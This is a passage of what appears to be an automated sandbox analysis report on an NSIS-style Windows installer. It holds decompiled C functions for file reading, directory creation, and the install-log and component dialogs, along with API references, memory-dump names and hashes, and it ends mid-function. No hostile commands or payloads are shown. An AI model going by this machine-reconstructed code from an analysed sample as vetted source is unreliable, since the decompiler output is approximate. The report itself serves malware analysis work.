					_t5 = SetFileAttributesW(_a4, _t3 & 0xfffffffe); // executed
					return _t5;
				}
				return _t3;
			}

0x00405e60
0x00405e69
0x00405e73
0x00000000
0x00405e73
0x00405e79

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Uniqueness

Uniqueness Score: -1.00%

Function 00403336, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403336(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x40c010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x0040333a
0x0040334d
0x00403355
0x00000000
0x0040335c
0x00000000
0x0040335e

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004037F8, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004037F8(void* __ecx, void* __eflags) {
				void* _t2;
				void* _t5;
				void* _t6;

				_t6 = __ecx;
				E00406064(0x4e30c8);
				_t2 = E00405D51(0x4e30c8);
				if(_t2 != 0) {
					E0040674E(0x4e30c8);
					CreateDirectoryW(0x4e30c8, 0); // executed
					_t5 = E00405EAB(_t6, 0x4df0c0, 0x4e30c8); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x004037f8
0x004037ff
0x00403805
0x0040380c
0x00403811
0x00403819
0x00403825
0x0040382b
0x0040380f
0x0040380f
0x0040380f

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Uniqueness

Uniqueness Score: -1.00%

Function 00403368, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403368(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40c010, _a4, 0, 0); // executed
				return _t2;
			}

0x00403376
0x0040337c

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Uniqueness

Uniqueness Score: -1.00%

Function 00403885, Relevance: 1.3, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403885() {
				void* _t1;
				void* _t3;
				signed int _t6;

				_t1 =  *0x40c010; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40c010 =  *0x40c010 | 0xffffffff;
					_t6 =  *0x40c010;
				}
				E00403CAF();
				_t3 = E00406CC7(_t6, 0x4e70d0, 7); // executed
				return _t3;
			}

0x00403885
0x0040388d
0x00403890
0x00403896
0x00403896
0x00403896
0x0040389d
0x004038a9
0x004038ae

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403AFD,?), ref: 00403890

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 983617adc3fb59bada791ca239273a70529ab93e183a396e050099d658997f71
Instruction ID: 859c8e5cf93c3f84440f38a6d8c6a0cb0ce917112422b96fb642ee91708591da
Opcode Fuzzy Hash: 983617adc3fb59bada791ca239273a70529ab93e183a396e050099d658997f71
Instruction Fuzzy Hash: 1BC01231504700D7E5206FB99D4EB043A54A74037DB544B7AF4F5F11F1C77C4645852D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004050F9, Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004050F9(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v48;
				signed int _v52;
				int _v56;
				int _v60;
				signed int _v64;
				int _v68;
				void* _v72;
				int _v80;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t92;
				unsigned int _t97;
				int _t99;
				int _t100;
				void* _t107;
				short _t111;
				short _t112;
				intOrPtr _t132;
				struct HWND__* _t136;
				intOrPtr _t138;
				int _t160;
				int _t161;
				struct HMENU__* _t166;
				struct HWND__* _t170;
				struct HWND__* _t171;
				void* _t173;
				void* _t174;
				short* _t175;

				_t171 =  *0x476a6c;
				_t160 = 0;
				_v8 = _t171;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405073, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L18:
						if(_a8 != 0x404) {
							L26:
							if(_a8 != 0x7b || _a12 != _t171) {
								goto L21;
							} else {
								_t92 = SendMessageW(_t171, 0x1004, _t160, _t160);
								_a8 = _t92;
								if(_t92 <= _t160) {
									L12:
									return 0;
								}
								_t166 = CreatePopupMenu();
								AppendMenuW(_t166, _t160, 1, E00406831(_t160, _t166, _t171, _t160, 0xffffffe1));
								_t97 = _a16;
								if(_t97 != 0xffffffff) {
									_t161 = _t97;
									_t99 = _t97 >> 0x10;
								} else {
									GetWindowRect(_t171,  &_v28);
									_t161 = _v28.left;
									_t99 = _v28.top;
								}
								_t100 = TrackPopupMenu(_t166, 0x180, _t161, _t99, _t160, _a4, _t160);
								_t173 = 1;
								if(_t100 == 1) {
									_v80 = _t160;
									_v68 = 0x451d98;
									_v64 = 0x1001f;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t173 = _t173 + SendMessageW(_v8, 0x1073, _a4,  &_v88) + 2;
									} while (_a4 != _t160);
									OpenClipboard(_t160);
									EmptyClipboard();
									_t107 = GlobalAlloc(0x42, _t173 + _t173);
									_a4 = _t107;
									_t174 = GlobalLock(_t107);
									do {
										_v68 = _t174;
										_t175 = _t174 + SendMessageW(_v8, 0x1073, _t160,  &_v88) * 2;
										_t111 = 0xd;
										 *_t175 = _t111;
										_t112 = 0xa;
										 *((short*)(_t175 + 2)) = _t112;
										_t174 = _t175 + 4;
										_t160 = _t160 + 1;
									} while (_t160 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(0xd, _a4);
									CloseClipboard();
								}
								goto L12;
							}
						}
						if( *0x476a74 == _t160) {
							ShowWindow( *0x47eab4, 8);
							if( *0x47eb6c == _t160) {
								E00404F9E( *((intOrPtr*)( *0x461db8 + 0x34)), _t160);
							}
							E00403D44(1);
							goto L26;
						}
						 *0x461dc0 = 2;
						E00403D44(0x78);
						goto L21;
					} else {
						if(_a12 != 0x403) {
							L21:
							return E00403DF6(_a8, _a12, _a16);
						}
						ShowWindow( *0x476a80, _t160);
						ShowWindow(_t171, 8);
						E00403DC4(_t171);
						goto L18;
					}
				}
				_v64 = _v64 | 0xffffffff;
				_v52 = _v52 | 0xffffffff;
				_v72 = 2;
				_v68 = 0;
				_v60 = 0;
				_v56 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t132 =  *0x47eabc;
				_a8 =  *((intOrPtr*)(_t132 + 0x5c));
				_a12 =  *((intOrPtr*)(_t132 + 0x60));
				 *0x476a80 = GetDlgItem(_a4, 0x403);
				 *0x476a78 = GetDlgItem(_a4, 0x3ee);
				_t136 = GetDlgItem(_a4, 0x3f8);
				 *0x476a6c = _t136;
				_v8 = _t136;
				E00403DC4( *0x476a80);
				_t138 = E004044A2(4);
				_push(0x4d30a8);
				 *0x476a84 = _t138;
				 *0x476a8c = 0;
				E004062CF(L"New install of \"%s\" to \"%s\"", E00406831(0, GetDlgItem, _t171, 0, 0xfffffffd));
				GetClientRect(_v8,  &_v28);
				_v64 = _v28.right - GetSystemMetrics(0x15);
				SendMessageW(_v8, 0x1061, 0,  &_v72);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t160) {
					SendMessageW(_v8, 0x1024, _t160, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403D6B(_a4);
				if(( *0x47eb08 & 0x00000003) != 0) {
					ShowWindow( *0x476a80, _t160);
					if(( *0x47eb08 & 0x00000002) != 0) {
						 *0x476a80 = _t160;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403DC4( *0x476a78);
				}
				_t170 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t170, 0x401, _t160, 0x75300000);
				if(( *0x47eb08 & 0x00000004) != 0) {
					SendMessageW(_t170, 0x409, _t160, _a12);
					SendMessageW(_t170, 0x2001, _t160, _a8);
				}
				goto L12;
			}

0x00405101
0x00405107
0x00405111
0x00405114
0x004052c8
0x004052ec
0x004052ec
0x004052ff
0x00405320
0x00405327
0x0040537e
0x00405382
0x00000000
0x00405389
0x00405391
0x00405397
0x0040539c
0x004052ba
0x00000000
0x004052ba
0x004053ab
0x004053b7
0x004053bd
0x004053c3
0x004053d8
0x004053de
0x004053c5
0x004053ca
0x004053d0
0x004053d3
0x004053d3
0x004053ec
0x004053f4
0x004053f7
0x00405400
0x00405403
0x0040540a
0x00405411
0x00405419
0x00405419
0x0040542d
0x00405431
0x00405437
0x0040543d
0x00405449
0x00405450
0x00405459
0x0040545b
0x00405464
0x0040546d
0x00405472
0x00405473
0x00405478
0x00405479
0x0040547d
0x00405480
0x00405481
0x00405489
0x00405494
0x0040549a
0x0040549a
0x00000000
0x004053f7
0x00405382
0x0040532f
0x0040535f
0x00405367
0x00405372
0x00405372
0x00405379
0x00000000
0x00405379
0x00405333
0x0040533d
0x00000000
0x00405301
0x0040530a
0x00405342
0x00000000
0x0040534b
0x00405313
0x00405318
0x0040531b
0x00000000
0x0040531b
0x004052ff
0x0040511a
0x0040511e
0x00405122
0x00405129
0x0040512c
0x0040512f
0x00405137
0x00405138
0x00405139
0x0040513a
0x0040513b
0x0040513c
0x00405155
0x00405158
0x00405165
0x00405174
0x00405179
0x00405181
0x00405186
0x00405189
0x00405190
0x00405195
0x0040519d
0x004051a2
0x004051b3
0x004051c2
0x004051e8
0x004051eb
0x004051fc
0x00405201
0x0040520f
0x0040521d
0x0040521d
0x00405222
0x00405230
0x00405230
0x00405235
0x00405238
0x0040523d
0x00405249
0x00405252
0x0040525f
0x0040526e
0x00405261
0x00405266
0x00405266
0x0040527a
0x0040527a
0x0040528f
0x00405297
0x004052a0
0x004052ac
0x004052b8
0x004052b8
0x00000000

APIs

GetDlgItem.USER32 ref: 0040515B
GetDlgItem.USER32 ref: 0040516A
GetClientRect.USER32 ref: 004051C2
GetSystemMetrics.USER32 ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32 ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32 ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424E27,7519EA30,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32 ref: 004052D7
CreateThread.KERNEL32 ref: 004052E5
CloseHandle.KERNEL32(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32 ref: 004053B7
GetWindowRect.USER32 ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32 ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405489
SetClipboardData.USER32 ref: 00405494
CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040549A

Strings

{, xrefs: 0040537E
New install of "%s" to "%s", xrefs: 004051AE

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: b870e07e0f90b65775997a4172df4cb72c50b11c5a38a9ad208b9f3c2b6ee9f0
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: b870e07e0f90b65775997a4172df4cb72c50b11c5a38a9ad208b9f3c2b6ee9f0
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004049A8, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E004049A8(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				long _v36;
				signed int _v48;
				int _v52;
				signed int* _v60;
				intOrPtr _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v84;
				intOrPtr _v88;
				void* _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t177;
				intOrPtr _t193;
				long _t199;
				signed int _t203;
				signed int _t214;
				void* _t217;
				void* _t218;
				int _t225;
				signed int* _t232;
				signed int _t234;
				struct HBITMAP__* _t244;
				void* _t246;
				signed int _t265;
				signed char _t266;
				long _t269;
				int _t276;
				signed int _t280;
				signed int _t287;
				signed int _t289;
				int* _t297;
				signed char* _t298;
				int _t301;
				int _t302;
				int _t303;
				signed int* _t304;
				int _t305;
				long _t306;
				long _t307;
				int _t308;
				signed int _t309;
				void* _t311;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t177 = GetDlgItem(_a4, 0x408);
				_t311 = SendMessageW;
				_v8 = _t177;
				_v28 =  *0x47eac8;
				_t276 = 0;
				_v32 =  *0x47eabc + 0x94;
				_t301 = 0x10;
				if(_a8 != 0x110) {
					L24:
					if(_a8 == 0x405) {
						_a12 = _t276;
						_a16 = 1;
						_a8 = 0x40f;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_t302 = _a16;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t302 + 4)) == 0x408) {
							if(( *0x47eb08 & 0x00000200) != 0) {
								L41:
								if(_t302 != _t276) {
									if( *((intOrPtr*)(_t302 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t276,  *(_t302 + 0x5c));
									}
									if( *((intOrPtr*)(_t302 + 8)) == 0xfffffe39) {
										_t278 = _v28;
										_t232 =  *(_t302 + 0x5c) * 0x4020 + _v28 + 8;
										if( *((intOrPtr*)(_t302 + 0xc)) != 2) {
											 *_t232 =  *_t232 & 0xffffffdf;
										} else {
											 *_t232 =  *_t232 | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t278 = 0 | _a8 != 0x00000413;
								_t234 = E0040487A(_v8, _a8 != 0x413);
								if(_t234 >= _t276) {
									_t95 = _v28 + 8; // 0x8
									_t297 = _t234 * 0x4020 + _t95;
									_t278 =  *_t297;
									if((_t278 & 0x00000010) == 0) {
										if((_t278 & 0x00000040) == 0) {
											_t287 = _t278 ^ 0x00000001;
										} else {
											_t289 = _t278 ^ 0x00000080;
											if(_t289 >= 0) {
												_t287 = _t289 & 0xfffffffe;
											} else {
												_t287 = _t289 | 0x00000001;
											}
										}
										 *_t297 = _t287;
										E00401186(_t234);
										_t278 = 1;
										_a12 = 1;
										_a16 =  !( *0x47eb08 >> 8) & 1;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t278 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t276, _t276);
							}
							if(_a8 == 0x40b) {
								_t217 =  *0x441d68;
								if(_t217 != _t276) {
									ImageList_Destroy(_t217);
								}
								_t218 =  *0x441d6c;
								if(_t218 != _t276) {
									GlobalFree(_t218);
								}
								 *0x441d68 = _t276;
								 *0x441d6c = _t276;
								 *0x47eb10 = _t276;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x47eb08 & 0x00000100) != 0) {
									_t303 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t303);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t303);
								}
								goto L89;
							} else {
								E004011F8(_t278, _t276, _t276);
								if(_a12 != _t276) {
									E0040141D(8);
								}
								if(_a16 == _t276) {
									L73:
									E004011F8(_t278, _t276, _t276);
									_v36 =  *0x441d6c;
									_t193 =  *0x47eac8;
									_v64 = 0xf030;
									_v28 = _t276;
									if( *0x47eacc <= _t276) {
										L84:
										InvalidateRect(_v8, _t276, 1);
										if( *((intOrPtr*)( *0x476a88 + 0x10)) != _t276) {
											E004043D9(E004044A2(5), 0x3ff, 0xfffffffb);
										}
										goto L86;
									}
									_t304 = _t193 + 8;
									do {
										_t199 =  *((intOrPtr*)(_v36 + _v28 * 4));
										if(_t199 != _t276) {
											_t280 =  *_t304;
											_v72 = _t199;
											_v76 = 8;
											if((_t280 & 0x00000100) != 0) {
												_v76 = 9;
												_v60 =  &(_t304[4]);
												 *_t304 =  *_t304 & 0xfffffeff;
											}
											if((_t280 & 0x00000040) == 0) {
												_t203 = (_t280 & 0x00000001) + 1;
												if((_t280 & 0x00000010) != 0) {
													_t203 = _t203 + 3;
												}
											} else {
												_t203 = 3;
											}
											_v68 = (_t203 << 0x0000000b | _t280 & 0x00000008) + (_t203 << 0x0000000b | _t280 & 0x00000008) | _t280 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t280 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, _t276,  &_v76);
										}
										_v28 = _v28 + 1;
										_t304 =  &(_t304[0x1008]);
									} while (_v28 <  *0x47eacc);
									goto L84;
								} else {
									_t305 = E004012F1( *0x441d6c);
									E004012A6(_t305);
									_t214 = 0;
									_t278 = 0;
									if(_t305 <= _t276) {
										L72:
										SendMessageW(_v12, 0x14e, _t278, _t276);
										_a16 = _t305;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v32 + _t214 * 4)) != _t276) {
											_t278 = _t278 + 1;
										}
										_t214 = _t214 + 1;
									} while (_t214 < _t305);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t225 = SendMessageW(_v12, 0x147, _t276, _t276);
							if(_t225 == 0xffffffff) {
								goto L89;
							}
							_t306 = SendMessageW(_v12, 0x150, _t225, _t276);
							if(_t306 == 0xffffffff ||  *((intOrPtr*)(_v32 + _t306 * 4)) == _t276) {
								_t306 = 0x20;
							}
							E004012A6(_t306);
							SendMessageW(_a4, 0x420, _t276, _t306);
							_a12 = 1;
							_a16 = _t276;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x47eb10 = _a4;
					_v36 = 0;
					_v24 = 2;
					 *0x441d6c = GlobalAlloc(0x40,  *0x47eacc << 2);
					_t244 = LoadBitmapW( *0x47eab8, 0x6e);
					 *0x461dc8 =  *0x461dc8 | 0xffffffff;
					_v20 = _t244;
					 *0x441d58 = SetWindowLongW(_v8, 0xfffffffc, E004048F8);
					_t246 = ImageList_Create(_t301, _t301, 0x21, 6, 0);
					 *0x441d68 = _t246;
					ImageList_AddMasked(_t246, _v20, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x441d68);
					if(SendMessageW(_v8, 0x111c, 0, 0) < _t301) {
						SendMessageW(_v8, 0x111b, _t301, 0);
					}
					DeleteObject(_v20);
					_t307 = 0;
					do {
						_t252 =  *((intOrPtr*)(_v32 + _t307 * 4));
						if( *((intOrPtr*)(_v32 + _t307 * 4)) != _t276) {
							if(_t307 != 0x20) {
								_v24 = _t276;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t276, E00406831(_t276, _t307, _t311, _t276, _t252)), _t307);
						}
						_t307 = _t307 + 1;
					} while (_t307 < 0x21);
					_t308 = _a16;
					_push( *((intOrPtr*)(_t308 + 0x30 + _v24 * 4)));
					_push(0x15);
					E00403D6B(_a4);
					_push( *((intOrPtr*)(_t308 + 0x34 + _v24 * 4)));
					_push(0x16);
					E00403D6B(_a4);
					_t309 = 0;
					_v16 = _t276;
					if( *0x47eacc <= _t276) {
						L20:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0xfffffffb);
						goto L21;
					} else {
						_v20 = _v28 + 8;
						do {
							_t298 = _v20;
							_t265 =  &(_t298[0x10]);
							if( *_t265 == 0) {
								goto L18;
							}
							_v68 = _t265;
							_t266 =  *_t298;
							_v92 = _v16;
							_t278 = 0x20;
							_v88 = 0xffff0002;
							_v84 = 0xd;
							_v72 = _t278;
							_v48 = _t309;
							_v76 = _t266 & _t278;
							if((_t266 & 0x00000002) == 0) {
								if(( *_v20 & 0x00000004) == 0) {
									_t269 = SendMessageW(_v8, 0x1132, 0,  &_v92);
									goto L17;
								}
								_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
							} else {
								_v84 = 0x4d;
								_v52 = 1;
								_t269 = SendMessageW(_v8, 0x1132, 0,  &_v92);
								_v16 = _t269;
								_v36 = 1;
								L17:
								_t278 =  *0x441d6c;
								 *( *0x441d6c + _t309 * 4) = _t269;
							}
							L18:
							_v20 = _v20 + 0x4020;
							_t309 = _t309 + 1;
						} while (_t309 <  *0x47eacc);
						if(_v36 != 0) {
							L21:
							if(_v24 != 0) {
								E00403DC4(_v8);
								_t276 = 0;
								goto L24;
							}
							ShowWindow(_v12, 5);
							E00403DC4(_v12);
							L89:
							return E00403DF6(_a8, _a12, _a16);
						}
						goto L20;
					}
